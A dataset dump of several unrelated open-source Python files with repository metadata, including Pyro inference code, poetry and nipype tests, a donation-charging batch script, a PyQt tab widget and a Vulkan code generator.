lp, slp = self._loss_and_surrogate_loss_particle(model_trace, guide_trace, *args, **kwargs)
loss += lp
surrogate_loss += slp
loss /= self.num_particles
surrogate_loss /= self.num_particles
return loss, surrogate_loss
def _loss_and_surrogate_loss_particle(self, model_trace, guide_trace, *args, **kwargs):
# compute elbo for reparameterized nodes
elbo, surrogate_elbo = _compute_elbo_reparam(model_trace, guide_trace)
baseline_loss = 0.0
# the following computations are only necessary if we have non-reparameterizable nodes
non_reparam_nodes = set(guide_trace.nonreparam_stochastic_nodes)
if non_reparam_nodes:
downstream_costs, _ = _compute_downstream_costs(model_trace, guide_trace, non_reparam_nodes)
surrogate_elbo_term, baseline_loss = _compute_elbo_non_reparam(guide_trace,
non_reparam_nodes,
downstream_costs)
surrogate_elbo += surrogate_elbo_term
surrogate_loss = -surrogate_elbo + baseline_loss
return elbo, surrogate_loss
class JitTraceGraph_ELBO(TraceGraph_ELBO):
"""
Like :class:`TraceGraph_ELBO` but uses :func:`torch.jit.trace` to
compile :meth:`loss_and_grads`.
This works only for a limited set of models:
- Models must have static structure.
- Models must not depend on any global data (except the param store).
- All model inputs that are tensors must be passed in via ``*args``.
- All model inputs that are *not* tensors must be passed in via
``**kwargs``, and compilation will be triggered once per unique
``**kwargs``.
"""
def loss_and_grads(self, model, guide, *args, **kwargs):
kwargs['_pyro_model_id'] = id(model)
kwargs['_pyro_guide_id'] = id(guide)
if getattr(self, '_jit_loss_and_surrogate_loss', None) is None:
# build a closure for loss_and_surrogate_loss
weakself = weakref.ref(self)
@pyro.ops.jit.trace(ignore_warnings=self.ignore_jit_warnings,
jit_options=self.jit_options)
def jit_loss_and_surrogate_loss(*args, **kwargs):
kwargs.pop('_pyro_model_id')
kwargs.pop('_pyro_guide_id')
self = weakself()
return self._loss_and_surrogate_loss(model, guide, *args, **kwargs)
self._jit_loss_and_surrogate_loss = jit_loss_and_surrogate_loss
loss, surrogate_loss = self._jit_loss_and_surrogate_loss(*args, **kwargs)
surrogate_loss.backward(retain_graph=self.retain_graph) # triggers jit compilation
loss = loss.item()
warn_if_nan(loss, "loss")
return loss
| 44.089286
| 107
| 0.671662
|
d9fd61f431c861b2e631d734a651819a77fbcd9a
| 1,025
|
py
|
Python
|
python/nano/src/bigdl/nano/automl/utils/parallel_worker.py
|
Forest216/BigDL
|
840da9a2eaf395978dd83730b02aa5e5dfbd7989
|
[
"Apache-2.0"
] | null | null | null |
python/nano/src/bigdl/nano/automl/utils/parallel_worker.py
|
Forest216/BigDL
|
840da9a2eaf395978dd83730b02aa5e5dfbd7989
|
[
"Apache-2.0"
] | null | null | null |
python/nano/src/bigdl/nano/automl/utils/parallel_worker.py
|
Forest216/BigDL
|
840da9a2eaf395978dd83730b02aa5e5dfbd7989
|
[
"Apache-2.0"
] | null | null | null |
#
# Copyright 2016 The BigDL Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import os
import sys
import cloudpickle
from pytorch_lightning.utilities.seed import reset_seed
if __name__ == '__main__':
temp_dir = sys.argv[1]
with open(os.path.join(temp_dir, "search_kwargs.pkl"), 'rb') as f:
kwargs = cloudpickle.load(f)
with open(os.path.join(temp_dir, "search_func.pkl"), 'rb') as f:
func = cloudpickle.load(f)
# do we need to reset seed?
# reset_seed()
func(**kwargs)
| 28.472222
| 74
| 0.717073
|
0114c5efe0ec118560ed9b1a344bc334936c803c
| 1,559
|
py
|
Python
|
nipype/interfaces/mrtrix3/tests/test_auto_DWIExtract.py
|
felixsc1/nipype
|
e722d6170593583f16ddfcb95473e5d30b5f1d7c
|
[
"Apache-2.0"
] | 8
|
2019-05-29T09:38:30.000Z
|
2021-01-20T03:36:59.000Z
|
nipype/interfaces/mrtrix3/tests/test_auto_DWIExtract.py
|
felixsc1/nipype
|
e722d6170593583f16ddfcb95473e5d30b5f1d7c
|
[
"Apache-2.0"
] | 12
|
2021-03-09T03:01:16.000Z
|
2022-03-11T23:59:36.000Z
|
nipype/interfaces/mrtrix3/tests/test_auto_DWIExtract.py
|
felixsc1/nipype
|
e722d6170593583f16ddfcb95473e5d30b5f1d7c
|
[
"Apache-2.0"
] | 1
|
2020-07-17T12:49:49.000Z
|
2020-07-17T12:49:49.000Z
|
# AUTO-GENERATED by tools/checkspecs.py - DO NOT EDIT
from __future__ import unicode_literals
from ..utils import DWIExtract
def test_DWIExtract_inputs():
input_map = dict(
args=dict(argstr='%s', ),
bval_scale=dict(argstr='-bvalue_scaling %s', ),
bzero=dict(argstr='-bzero', ),
environ=dict(
nohash=True,
usedefault=True,
),
grad_file=dict(argstr='-grad %s', ),
grad_fsl=dict(argstr='-fslgrad %s %s', ),
in_bval=dict(),
in_bvec=dict(argstr='-fslgrad %s %s', ),
in_file=dict(
argstr='%s',
mandatory=True,
position=-2,
),
nobzero=dict(argstr='-no_bzero', ),
nthreads=dict(
argstr='-nthreads %d',
nohash=True,
),
out_file=dict(
argstr='%s',
mandatory=True,
position=-1,
),
shell=dict(
argstr='-shell %s',
sep=',',
),
singleshell=dict(argstr='-singleshell', ),
)
inputs = DWIExtract.input_spec()
for key, metadata in list(input_map.items()):
for metakey, value in list(metadata.items()):
assert getattr(inputs.traits()[key], metakey) == value
def test_DWIExtract_outputs():
output_map = dict(out_file=dict(), )
outputs = DWIExtract.output_spec()
for key, metadata in list(output_map.items()):
for metakey, value in list(metadata.items()):
assert getattr(outputs.traits()[key], metakey) == value
| 29.980769
| 67
| 0.54907
|
66b0dae9b697ea9d4dcd8164e5632a1903e34643
| 4,415
|
py
|
Python
|
tests/console/commands/test_config.py
|
AWhetter/poetry
|
b1d380ec63ef43a2b59c52d10f9733b50eca9081
|
[
"MIT"
] | null | null | null |
tests/console/commands/test_config.py
|
AWhetter/poetry
|
b1d380ec63ef43a2b59c52d10f9733b50eca9081
|
[
"MIT"
] | null | null | null |
tests/console/commands/test_config.py
|
AWhetter/poetry
|
b1d380ec63ef43a2b59c52d10f9733b50eca9081
|
[
"MIT"
] | null | null | null |
import json
import os
import pytest
from poetry.config.config_source import ConfigSource
from poetry.core.pyproject.exceptions import PyProjectException
from poetry.factory import Factory
@pytest.fixture()
def tester(command_tester_factory):
return command_tester_factory("config")
def test_show_config_with_local_config_file_empty(tester, mocker):
mocker.patch(
"poetry.factory.Factory.create_poetry",
side_effect=PyProjectException("[tool.poetry] section not found"),
)
tester.execute()
assert "" == tester.io.fetch_output()
def test_list_displays_default_value_if_not_set(tester, config, config_cache_dir):
tester.execute("--list")
expected = """cache-dir = {cache}
experimental.new-installer = true
installer.parallel = true
virtualenvs.create = true
virtualenvs.in-project = null
virtualenvs.options.always-copy = false
virtualenvs.path = {path} # {virtualenvs}
""".format(
cache=json.dumps(str(config_cache_dir)),
path=json.dumps(os.path.join("{cache-dir}", "virtualenvs")),
virtualenvs=str(config_cache_dir / "virtualenvs"),
)
assert expected == tester.io.fetch_output()
def test_list_displays_set_get_setting(tester, config, config_cache_dir):
tester.execute("virtualenvs.create false")
tester.execute("--list")
expected = """cache-dir = {cache}
experimental.new-installer = true
installer.parallel = true
virtualenvs.create = false
virtualenvs.in-project = null
virtualenvs.options.always-copy = false
virtualenvs.path = {path} # {virtualenvs}
""".format(
cache=json.dumps(str(config_cache_dir)),
path=json.dumps(os.path.join("{cache-dir}", "virtualenvs")),
virtualenvs=str(config_cache_dir / "virtualenvs"),
)
assert 0 == config.set_config_source.call_count
assert expected == tester.io.fetch_output()
def test_display_single_setting(tester, config):
tester.execute("virtualenvs.create")
expected = """true
"""
assert expected == tester.io.fetch_output()
def test_display_single_local_setting(command_tester_factory, fixture_dir):
tester = command_tester_factory(
"config", poetry=Factory().create_poetry(fixture_dir("with_local_config"))
)
tester.execute("virtualenvs.create")
expected = """false
"""
assert expected == tester.io.fetch_output()
def test_list_displays_set_get_local_setting(tester, config, config_cache_dir):
tester.execute("virtualenvs.create false --local")
tester.execute("--list")
expected = """cache-dir = {cache}
experimental.new-installer = true
installer.parallel = true
virtualenvs.create = false
virtualenvs.in-project = null
virtualenvs.options.always-copy = false
virtualenvs.path = {path} # {virtualenvs}
""".format(
cache=json.dumps(str(config_cache_dir)),
path=json.dumps(os.path.join("{cache-dir}", "virtualenvs")),
virtualenvs=str(config_cache_dir / "virtualenvs"),
)
assert 1 == config.set_config_source.call_count
assert expected == tester.io.fetch_output()
def test_set_pypi_token(tester, auth_config_source):
tester.execute("pypi-token.pypi mytoken")
tester.execute("--list")
assert "mytoken" == auth_config_source.config["pypi-token"]["pypi"]
def test_set_client_cert(tester, auth_config_source, mocker):
mocker.spy(ConfigSource, "__init__")
tester.execute("certificates.foo.client-cert path/to/cert.pem")
assert (
"path/to/cert.pem"
== auth_config_source.config["certificates"]["foo"]["client-cert"]
)
def test_set_cert(tester, auth_config_source, mocker):
mocker.spy(ConfigSource, "__init__")
tester.execute("certificates.foo.cert path/to/ca.pem")
assert "path/to/ca.pem" == auth_config_source.config["certificates"]["foo"]["cert"]
def test_config_installer_parallel(tester, command_tester_factory):
tester.execute("--local installer.parallel")
assert tester.io.fetch_output().strip() == "true"
workers = command_tester_factory(
"install"
)._command._installer._executor._max_workers
assert workers > 1
tester.io.clear_output()
tester.execute("--local installer.parallel false")
tester.execute("--local installer.parallel")
assert tester.io.fetch_output().strip() == "false"
workers = command_tester_factory(
"install"
)._command._installer._executor._max_workers
assert workers == 1
| 28.668831
| 87
| 0.719366
|
b8e8904722a39c0ccad2e548d8ca749c8f3adbe7
| 3,711
|
py
|
Python
|
batch-tmp.py
|
MinnPost/donations
|
075d3a764e21022e247a4aa1066c234c7ab4f68b
|
[
"MIT"
] | 2
|
2021-06-02T06:54:38.000Z
|
2021-11-29T19:37:55.000Z
|
batch-tmp.py
|
MinnPost/donations
|
075d3a764e21022e247a4aa1066c234c7ab4f68b
|
[
"MIT"
] | 17
|
2020-10-20T22:40:45.000Z
|
2021-06-25T13:30:49.000Z
|
batch-tmp.py
|
MinnPost/donations
|
075d3a764e21022e247a4aa1066c234c7ab4f68b
|
[
"MIT"
] | 1
|
2021-01-08T02:23:35.000Z
|
2021-01-08T02:23:35.000Z
|
import logging
from config import ACCOUNTING_MAIL_RECIPIENT, LOG_LEVEL, REDIS_TLS_URL, TIMEZONE
from datetime import datetime, timedelta
from pytz import timezone
import celery
import redis
from charges import amount_to_charge, charge, ChargeException
from npsp import Opportunity
from util import send_email
zone = timezone(TIMEZONE)
log_level = logging.getLevelName(LOG_LEVEL)
root = logging.getLogger()
root.setLevel(log_level)
class Log(object):
"""
This encapulates sending to the console/stdout and email all in one.
"""
def __init__(self):
self.log = list()
def it(self, string):
"""
Add something to the log.
"""
logging.debug(string)
self.log.append(string)
def send(self):
"""
Send the assembled log out as an email.
"""
body = "\n".join(self.log)
recipient = ACCOUNTING_MAIL_RECIPIENT
subject = "Batch run"
send_email(body=body, recipient=recipient, subject=subject)
class AlreadyExecuting(Exception):
"""
Here to show when more than one job of the same type is running.
"""
pass
class Lock(object):
"""
Claim an exclusive lock. Using Redis.
"""
def __init__(self, key):
self.key = key
self.connection = redis.from_url(REDIS_TLS_URL)
def acquire(self):
if self.connection.get(self.key):
raise AlreadyExecuting
self.connection.setex(name=self.key, value="bar", time=1200)
def release(self):
self.connection.delete(self.key)
# TODO stop sending this email and just rely on Sentry and logs?
@celery.task()
def charge_cards():
lock = Lock(key="charge-cards-lock")
lock.acquire()
log = Log()
log.it("---Starting batch card job...")
ten_days_ago = (datetime.now(tz=zone) - timedelta(days=10)).strftime("%Y-%m-%d")
today = datetime.now(tz=zone).strftime("%Y-%m-%d")
opportunities = Opportunity.list(begin=ten_days_ago, end=today)
log.it("---Processing charges...")
log.it(f"Found {len(opportunities)} opportunities available to process.")
for opportunity in opportunities:
if not opportunity.stripe_customer_id:
continue
amount = amount_to_charge(opportunity)
log.it(
f"---- Charging ${amount} to {opportunity.stripe_customer_id} ({opportunity.name})"
)
try:
charge(opportunity)
except ChargeException as e:
logging.info("Batch charge error")
e.send_slack_notification()
log.send()
lock.release()
@celery.task()
def update_ach_charges():
lock = Lock(key="update-ach-charges-lock")
lock.acquire()
log = Log()
log.it('---Starting batch ach job...')
log.it('---Checking for status changes on ACH charges...')
ten_days_ago = (datetime.now(tz=zone) - timedelta(days=10)).strftime("%Y-%m-%d")
today = datetime.now(tz=zone).strftime("%Y-%m-%d")
opportunities = Opportunity.list(begin=ten_days_ago, end=today)
log.it("---Processing charges...")
log.it(f"Found {len(opportunities)} opportunities available to process.")
for opportunity in opportunities:
if not opportunity.stripe_customer_id:
continue
amount = amount_to_charge(opportunity)
log.it(
f"---- ACH Charging ${amount} to {opportunity.stripe_customer_id} ({opportunity.name})"
)
try:
charge(opportunity)
except ChargeException as e:
logging.info("ACH batch charge error")
e.send_slack_notification()
log.send()
lock.release()
if __name__ == "__main__":
charge_cards()
| 24.097403
| 99
| 0.637564
|
f11bbd4d2dd7880d773b173d6f74e8fec22c7292
| 42
|
py
|
Python
|
server/__init__.py
|
nghiattr/flask-docker
|
670cbd2a9255962989f10a92c4ba2375fb0aebb1
|
[
"MIT"
] | null | null | null |
server/__init__.py
|
nghiattr/flask-docker
|
670cbd2a9255962989f10a92c4ba2375fb0aebb1
|
[
"MIT"
] | null | null | null |
server/__init__.py
|
nghiattr/flask-docker
|
670cbd2a9255962989f10a92c4ba2375fb0aebb1
|
[
"MIT"
] | 1
|
2021-10-30T01:28:24.000Z
|
2021-10-30T01:28:24.000Z
|
from .app import *
__version__ = '0.1.4'
| 10.5
| 21
| 0.642857
|
6411f564a0fcf85ff6cc953ad0a31dc22a49fcda
| 4,628
|
py
|
Python
|
WiredQT/plugin/Tab/Tab.py
|
chiptrontech/WiredQTv1.0
|
760948bb736867db4e772031b23ed9151e0364b9
|
[
"MIT"
] | 1
|
2021-12-18T09:17:08.000Z
|
2021-12-18T09:17:08.000Z
|
WiredQT/plugin/Tab/Tab.py
|
chiptrontech/WiredQTv1.0
|
760948bb736867db4e772031b23ed9151e0364b9
|
[
"MIT"
] | null | null | null |
WiredQT/plugin/Tab/Tab.py
|
chiptrontech/WiredQTv1.0
|
760948bb736867db4e772031b23ed9151e0364b9
|
[
"MIT"
] | 2
|
2021-12-18T09:15:53.000Z
|
2022-01-19T15:10:14.000Z
|
from PyQt5 import QtCore, QtWidgets
from PyQt5.QtGui import *
from wired_module import *
# Generated By WiredQT for Python: by Rocky Nuarin, 2021 Phils
class Handler(QtWidgets.QWidget,usercontrol):
#WiredEvent def tabchange(self,index)
#WiredProperty 'TabVisible':'True','list':["True","False"]
#WiredProperty 'BackColorTab': '(1,1,1,0)'
def __init__(self, *param):
super(Handler, self).__init__(None)
initUI(self,param,w=1366,h=768,title="WiredQT v1.0",controlbox=True,startpos=(0,30),timeoutdestroy=-1)
self.GTKForms()
self.timer=QtCore.QTimer()
self.timer.timeout.connect(self.loop)
self.timer.start(10)
self.sch=Scheduler(0)
self.sch.Start()
self._text=''
self.showtab=True
self._TabVisible=True
self._BackColor='(1,1,1,0)'
@property
def BackColorTab(self):
return self._BackColor
@BackColorTab.setter
def BackColorTab(self,value):
#import pdb;pdb.set_trace();
if type(value)==str:
value=eval(value)
self._BackColor=value
self.Viewport1.BackColor=self._BackColor
@property
def TabVisible(self):
return TrueFalse(self._TabVisible)
@TabVisible.setter
def TabVisible(self,value):
self._TabVisible=TrueFalse(value)
try:
if self._TabVisible==True:
for i,a in enumerate(self.btn):
a.Visible=True
self.tab[i].Top=30
else:
for i,a in enumerate(self.btn):
a.Visible=False
self.tab[i].Top=0
except:
value=value
def TabLabel(self,index,label):
self.label[index]=label
self.btn[index].Text=label
def arrangetabs(self):
self.tab=[]
self.label=[]
self.btn=[]
#import pdb;pdb.set_trace()
for a in dir(self.caller):
try:
a=eval("self.caller."+a)
if len(str(type(a)))>len("<class \'tab") and str(type(a))[:len("<class \'tab")]=="<class \'tab" and a!=self:
if (a in self.tab)==False:
self.tab.append(a)
self.label.append("Tab "+str(len(self.label)+1))
except:
pass
#import pdb;pdb.set_trace();
#sort by tab.Left#
#array of tab.Left,tab.label
x=[[a.Left,a,b] for a,b in zip(self.tab,self.label)]
#sort by first index
def sortthis(item):
return item[0]
x=sorted(x, key=sortthis)
#return sorted value
self.tab= [a[1] for a in x]
self.label= [a[2] for a in x]
for i,a in enumerate(self.tab):
btn=QPushButton()
btn.setParent(self)
btn=forms(btn)
self.btn.append(btn)
btn.Text=self.label[i]
btn.Width=100
btn.Height=20
btn.Left=i*100
btn.Top=0
btn.Visible=True
#btn.connect("clicked",self.Tab)
btn.obj.clicked.connect(self.Tab)
self.tab[i].Width=self.Width
self.tab[i].Height=self.Height-20
#self.caller.usercontrol.remove(self.tab[i]._usercontrol)
#self.usercontrol.put(self.tab[i]._usercontrol,30,0)
self.tab[i].setParent(None)
self.tab[i].setParent(self)
self.tab[i].Top=30
self.tab[i].Left=0#self.usercontrol.Left
#print(a,self.tab[i])
if i!=0:
self.tab[i].Visible=False
self.setvisible(0)
self.TabVisible=self._TabVisible
def Tab(self,args):
if type(args)==int:
a=args
else:
args=self.sender()
if type(args)==QPushButton:
a=self.label.index(forms(args).Text)
else:
a=args
self.setvisible(a)
if self.caller!=None and 'tabchange' in self.wiredevents:self.wiredevents['tabchange'](a)
pass
def setvisible(self,index):
for i,a in enumerate(self.tab):
a.Visible=False
self.btn[i].ForeColor=(0,0,0,1)
self.tab[index].Visible=True
self.btn[index].ForeColor=(0,0,1,1)
pass
def connect(self,ev,evusr):
self.wiredevents.update({ev:evusr})
def activeXcreated(self,*args):
self.Viewport1.Width=self.Width
self.Viewport1.Height=self.Height
pass
def loop(self):
if self.form_load==False:
self.form_load=True
if self.sch.Event():#timer routine
#code here
if self.timeoutdestroy!=-1:
self.timeoutdestroy-=1
if self.timeoutdestroy==0:
self.unload(None)
self.sch.Start()#restart scheduler
return True #return true so that main_loop can call it again
def createwidget(self,prop,control,parent,event=[]):
createWidget(self,prop,control,parent,event)
def GTKForms(self):
self.createwidget("{'Left': '0', 'Events': [], 'Top': '0', 'Tag': '', 'Enable': 'True', 'Name': 'Viewport1', 'Var': '', 'Width': '240', 'Height': '125', 'Font': '', 'ForeColor': '(0.92,0.59,0.59,0.3)', 'Picture': '', 'BackColor': '(0.92,0.59,0.59,0.3)', 'Text': '', 'Visible': 'True', 'ParentsType': '', 'Help': ''}",'QWidget','usercontrol',"[]")
def Widget(self):
return self
if __name__ == '__main__':
import sys
app = QtWidgets.QApplication(sys.argv)
w = Handler()
w.show()
sys.exit(app.exec_())
| 28.567901
| 348
| 0.669404
|
dcb3ccff3611cc10ab5a9e7afcd72f5732e77d60
| 9,298
|
py
|
Python
|
scripts/command_counter_generator.py
|
bethau/Vulkan-ValidationLayers
|
e798df982b1b6fdcbc048f1987cba42cb68dfafa
|
[
"Apache-2.0"
] | 3
|
2020-07-04T07:23:40.000Z
|
2021-07-04T00:15:37.000Z
|
scripts/command_counter_generator.py
|
bethau/Vulkan-ValidationLayers
|
e798df982b1b6fdcbc048f1987cba42cb68dfafa
|
[
"Apache-2.0"
] | null | null | null |
scripts/command_counter_generator.py
|
bethau/Vulkan-ValidationLayers
|
e798df982b1b6fdcbc048f1987cba42cb68dfafa
|
[
"Apache-2.0"
] | 5
|
2021-01-24T11:28:26.000Z
|
2021-07-04T00:15:38.000Z
|
#!/usr/bin/python3 -i
#
# Copyright (c) 2015-2020 The Khronos Group Inc.
# Copyright (c) 2015-2020 Valve Corporation
# Copyright (c) 2015-2020 LunarG, Inc.
# Copyright (c) 2019-2020 Intel Corporation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Author: Mark Lobodzinski <mark@lunarg.com>
# Author: Lionel Landwerlin <lionel.g.landwerlin@intel.com>
import os,re,sys
import xml.etree.ElementTree as etree
from generator import *
from collections import namedtuple
from common_codegen import *
#
# CommandCounterOutputGeneratorOptions - subclass of GeneratorOptions.
class CommandCounterOutputGeneratorOptions(GeneratorOptions):
def __init__(self,
conventions = None,
filename = None,
directory = '.',
genpath = None,
apiname = None,
profile = None,
versions = '.*',
emitversions = '.*',
defaultExtensions = None,
addExtensions = None,
removeExtensions = None,
emitExtensions = None,
sortProcedure = regSortFeatures,
prefixText = "",
genFuncPointers = True,
apicall = '',
apientry = '',
apientryp = '',
alignFuncParam = 0,
expandEnumerants = True,
lvt_file_type = ''):
GeneratorOptions.__init__(self,
conventions = conventions,
filename = filename,
directory = directory,
genpath = genpath,
apiname = apiname,
profile = profile,
versions = versions,
emitversions = emitversions,
defaultExtensions = defaultExtensions,
addExtensions = addExtensions,
removeExtensions = removeExtensions,
emitExtensions = emitExtensions,
sortProcedure = sortProcedure)
self.prefixText = prefixText
self.genFuncPointers = genFuncPointers
self.prefixText = None
self.apicall = apicall
self.apientry = apientry
self.apientryp = apientryp
self.alignFuncParam = alignFuncParam
self.lvt_file_type = lvt_file_type
#
# CommandCounterOutputGenerator - subclass of OutputGenerator.
# Generates files needed by the layer validation state tracker
class CommandCounterOutputGenerator(OutputGenerator):
"""Generate command counter in VkCommandBuffer based on XML element attributes"""
def __init__(self,
errFile = sys.stderr,
warnFile = sys.stderr,
diagFile = sys.stdout):
OutputGenerator.__init__(self, errFile, warnFile, diagFile)
# Internal state - accumulators for different inner block text
self.dispatch_list = [] # List of entries for dispatch list
#
# Called once at the beginning of each run
def beginFile(self, genOpts):
OutputGenerator.beginFile(self, genOpts)
# Initialize members that require the tree
self.handle_types = GetHandleTypes(self.registry.tree)
self.lvt_file_type = genOpts.lvt_file_type
if genOpts.lvt_file_type == 'function_pointer_header':
write("#pragma once", file=self.outFile)
# User-supplied prefix text, if any (list of strings)
if (genOpts.prefixText):
for s in genOpts.prefixText:
write(s, file=self.outFile)
# File Comment
file_comment = '// *** THIS FILE IS GENERATED - DO NOT EDIT ***\n'
file_comment += '// See command_counter_generator.py for modifications\n'
write(file_comment, file=self.outFile)
# Copyright Notice
copyright = '/*\n'
copyright += ' * Copyright (c) 2015-2020 The Khronos Group Inc.\n'
copyright += ' * Copyright (c) 2015-2020 Valve Corporation\n'
copyright += ' * Copyright (c) 2015-2020 LunarG, Inc.\n'
copyright += ' * Copyright (c) 2019-2020 Intel Corporation\n'
copyright += ' *\n'
copyright += ' * Licensed under the Apache License, Version 2.0 (the "License");\n'
copyright += ' * you may not use this file except in compliance with the License.\n'
copyright += ' * You may obtain a copy of the License at\n'
copyright += ' *\n'
copyright += ' * http://www.apache.org/licenses/LICENSE-2.0\n'
copyright += ' *\n'
copyright += ' * Unless required by applicable law or agreed to in writing, software\n'
copyright += ' * distributed under the License is distributed on an "AS IS" BASIS,\n'
copyright += ' * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n'
copyright += ' * See the License for the specific language governing permissions and\n'
copyright += ' * limitations under the License.\n'
copyright += ' *\n'
copyright += ' * Author: Mark Lobodzinski <mark@lunarg.com>\n'
copyright += ' * Author: Lionel Landwerlin <lionel.g.landwerlin@intel.com>\n'
copyright += ' */\n'
write(copyright, file=self.outFile)
#
# Write completed source code to output file
def endFile(self):
dest_file = ''
dest_file += self.OutputDestFile()
# Remove blank lines at EOF
if dest_file.endswith('\n'):
dest_file = dest_file[:-1]
write(dest_file, file=self.outFile);
# Finish processing in superclass
OutputGenerator.endFile(self)
#
# Processing at beginning of each feature or extension
def beginFeature(self, interface, emit):
OutputGenerator.beginFeature(self, interface, emit)
self.featureExtraProtect = GetFeatureProtect(interface)
#
# Process commands, adding to dispatch list
def genCmd(self, cmdinfo, name, alias):
OutputGenerator.genCmd(self, cmdinfo, name, alias)
# Get first param type
params = cmdinfo.elem.findall('param')
info = self.getTypeNameTuple(params[0])
if name.startswith('vkCmd') and info[0] == 'VkCommandBuffer':
self.dispatch_list.append((self.featureExtraProtect, name, cmdinfo))
#
# Retrieve the type and name for a parameter
def getTypeNameTuple(self, param):
type = ''
name = ''
for elem in param:
if elem.tag == 'type':
type = noneStr(elem.text)
elif elem.tag == 'name':
name = noneStr(elem.text)
return (type, name)
#
# Create the test function pointer source and return it as a string
def GenerateFunctionPointerSource(self):
entries = []
entries = self.dispatch_list
table = '#include "chassis.h"\n'
table += '#include "state_tracker.h"\n'
table += '#include "command_counter.h"\n'
table += '\n'
for item in entries:
# Remove 'vk' from proto name
base_name = item[1][2:]
if item[0] is not None:
table += '#ifdef %s\n' % item[0]
params = item[2].elem.findall('param')
paramstext = ', '.join([''.join(param.itertext()) for param in params])
table += 'void CommandCounter::PreCallRecord%s(%s) {\n' % (base_name, paramstext)
table += ' coreChecks->IncrementCommandCount(%s);\n' % params[0].findall('name')[0].text
table += '}\n'
if item[0] is not None:
table += '#endif // %s\n' % item[0]
return table
#
# Create the test function pointer source and return it as a string
def GenerateFunctionPointerHeader(self):
entries = []
table = ''
entries = self.dispatch_list
for item in entries:
# Remove 'vk' from proto name
base_name = item[1][2:]
if item[0] is not None:
table += '#ifdef %s\n' % item[0]
params = item[2].elem.findall('param')
paramstext = ', '.join([''.join(param.itertext()) for param in params])
table += 'void PreCallRecord%s(%s);\n' % (base_name, paramstext)
if item[0] is not None:
table += '#endif // %s\n' % item[0]
return table
# Create a helper file and return it as a string
def OutputDestFile(self):
if self.lvt_file_type == 'function_pointer_header':
return self.GenerateFunctionPointerHeader()
elif self.lvt_file_type == 'function_pointer_source':
return self.GenerateFunctionPointerSource()
else:
return 'Bad LVT File Generator Option %s' % self.lvt_file_type
| 41.695067
| 103
| 0.599054
|
4d3f34b6dd1dc0748d74f7ceb392be66f6e0770c
| 500
|
py
|
Python
|
elf_parser_factory.py
|
manojrupireddy/encutils
|
c931aa84956c57bea42d0c2dec238547d97d450b
|
[
"MIT"
] | null | null | null |
elf_parser_factory.py
|
manojrupireddy/encutils
|
c931aa84956c57bea42d0c2dec238547d97d450b
|
[
"MIT"
] | 3
|
2020-09-14T17:37:21.000Z
|
2020-09-14T18:58:04.000Z
|
elf_parser_factory.py
|
manojrupireddy/encutils
|
c931aa84956c57bea42d0c2dec238547d97d450b
|
[
"MIT"
] | 1
|
2020-09-16T21:25:34.000Z
|
2020-09-16T21:25:34.000Z
|
import shutil
import sys
from objdump_parser import ObjDumpParser
from llvm_objdump_parser import LLVMObjDumpParser
def get_elf_parser(binary_file_name, show_symbol_files):
if shutil.which("llvm-objdump") is not None:
return LLVMObjDumpParser(binary_file_name, show_symbol_files)
else:
if sys.platform == "Win32":
return None
elif "linux" in sys.platform:
return ObjDumpParser(binary_file_name, show_symbol_files)
return None
| 31.25
| 73
| 0.718
|
21c6117584bf39b0b538ffa122d29c6cb09d5192
| 1,564
|
py
|
Python
|
mottak-arkiv-service/tests/tools/azure_servicebus/send_message.py
|
omBratteng/mottak
|
b7d2e1d063b31c2ad89c66e5414297612f91ebe9
|
[
"Apache-2.0"
] | null | null | null |
mottak-arkiv-service/tests/tools/azure_servicebus/send_message.py
|
omBratteng/mottak
|
b7d2e1d063b31c2ad89c66e5414297612f91ebe9
|
[
"Apache-2.0"
] | null | null | null |
mottak-arkiv-service/tests/tools/azure_servicebus/send_message.py
|
omBratteng/mottak
|
b7d2e1d063b31c2ad89c66e5414297612f91ebe9
|
[
"Apache-2.0"
] | null | null | null |
import logging
import os
import sys
import json
from dotenv import load_dotenv
from azure.servicebus import ServiceBusClient, ServiceBusMessage
load_dotenv()
# Sets up logging
logging.basicConfig(level=logging.INFO, format='%(name)s | %(levelname)s | %(message)s')
logging.getLogger('uamqp').setLevel(logging.WARNING)
logger = logging.getLogger(__name__)
if __name__ == '__main__':
queue_name = os.getenv('TEST_SENDER_QUEUE_NAME')
if not queue_name:
sys.exit('Environment variable TEST_SENDER_QUEUE_NAME is not set.')
connection_string = os.getenv('AZURE_SERVICE_BUS_SENDER_CONNECTION_STRING')
if not connection_string:
sys.exit('Environment variable AZURE_SERVICE_BUS_SENDER_CONNECTION_STRING is not set.')
message = json.dumps({
"arkivkopi_id": 69,
"status": "OK"
})
# message = json.dumps({
# "arkivkopi_id": 10,
# "depotinstitusjon": "arkivverket",
# "storage_account": "arkivverket",
# "source_bucket": "47a35d94-b6b4-4868-9d4a-bfba7f676fce",
# "source_prefix": "b26616cd-fb9d-4840-984c-48bc9d22538d",
# "sas_token": ""
# })
messages = []
for i in range(0, 1):
messages.append(ServiceBusMessage(message))
with ServiceBusClient.from_connection_string(conn_str=connection_string) as queue_client:
with queue_client.get_queue_sender(queue_name=queue_name) as sender:
logger.info(f"Sending {len(messages)} message(s) to the service bus {queue_name} queue")
sender.send_messages(messages)
| 31.918367
| 100
| 0.698849
|
7e76997dc38057dbb1aa13424f82aedba7e9c417
| 7,807
|
py
|
Python
|
docs/conf.py
|
shun-liang/whosaidwhat
|
66a593abf74f414d05481514887d4cd84cf99d78
|
[
"MIT"
] | null | null | null |
docs/conf.py
|
shun-liang/whosaidwhat
|
66a593abf74f414d05481514887d4cd84cf99d78
|
[
"MIT"
] | null | null | null |
docs/conf.py
|
shun-liang/whosaidwhat
|
66a593abf74f414d05481514887d4cd84cf99d78
|
[
"MIT"
] | null | null | null |
# whosaidwhat documentation build configuration file, created by
# sphinx-quickstart.
#
# This file is execfile()d with the current directory set to its containing dir.
#
